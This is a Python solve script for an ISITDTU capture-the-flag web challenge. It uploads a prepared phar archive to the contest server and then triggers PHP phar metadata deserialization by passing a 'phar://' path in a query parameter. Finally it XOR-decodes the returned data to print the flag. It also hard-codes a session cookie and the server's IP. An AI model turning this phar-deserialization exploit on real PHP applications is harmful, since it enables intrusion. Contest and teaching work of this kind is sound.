solve_multi_web.py
import requests
import binascii
from base64 import *
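def xor(data, key):
    """Return *data* XORed with *key*, repeating the key as often as needed.

    Each output character is ``chr(a ^ b)`` for the paired code units of
    *data* and the cycled *key*, so applying the same key twice restores the
    input. The result has the same length as *data*; an empty *data* or an
    empty *key* yields an empty string.

    ``itertools.izip`` exists only on Python 2, so the builtin ``zip`` is used
    when it is missing. Items that are already integers (Python 3 ``bytes``
    iterate as ints) are used directly instead of being passed to ``ord``.
    """
    from itertools import cycle
    try:
        from itertools import izip as lazy_zip  # Python 2: lazy pairing
    except ImportError:
        lazy_zip = zip  # Python 3: the builtin zip is already lazy

    def _code(unit):
        # A one-character string needs ord(); an int is already a code unit.
        return unit if isinstance(unit, int) else ord(unit)

    return ''.join(chr(_code(x) ^ _code(y)) for (x, y) in lazy_zip(data, cycle(key)))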
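# Read the prepared archive once and close the handle. The first 34 bytes are
# dropped before upload; the page does not say what they contain.
with open("phar.phar", "rb") as phar_file:
    save = phar_file.read()[34:]

# "GIF" XORed with "##\n" is used three times below (form field, query string,
# final decode), so it is computed once.
secret = xor("GIF", "##\n")

url = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?mytresure"
# NOTE(review): a session id left in a published script stays usable by any
# reader until the server expires it.
cookies = {"PHPSESSID": "e96ujfgcgvbji7425o2aabj06e"}
data = {"secret": secret, "save": save}
s = requests.Session()
# Every request goes through a local proxy on 127.0.0.1:8888.
proxy = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}

# Step 1: submit the archive bytes, then reload the page to read where the
# server stored them.
s.post(url, data=data, proxies=proxy, cookies=cookies)
page = s.get(url, proxies=proxy, cookies=cookies).content.decode("utf-8")
stored_path = page.split(
    """<div class="alert alert-warning">Your original treasure stored at""")[1].split(" </div>")[0].strip().replace(".txt", "")

# Step 2: pass the stored path back with a phar:// scheme in "friendtresure".
# NOTE(review): the server code is not shown here. If this parameter reaches a
# PHP filesystem function, PHP releases before 8.0 unserialize the archive's
# metadata on access; the server-side fix is to reject stream-wrapper schemes
# in user-supplied paths rather than to filter file contents.
url2 = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?secret=" + secret + \
    "&friendtresure=phar://" + stored_path
content = s.get(url2, proxies=proxy, cookies=cookies).text.split(
    '<img src="data:images/png;base64,')[1].replace('" height="300" width="800">', '').strip()

# The response embeds base64 data that is XORed with the same secret.
print(xor(b64decode(content), secret))
# ISITDTU{850d5f07cd08a49a0f74d6a089353f3196e74d7e}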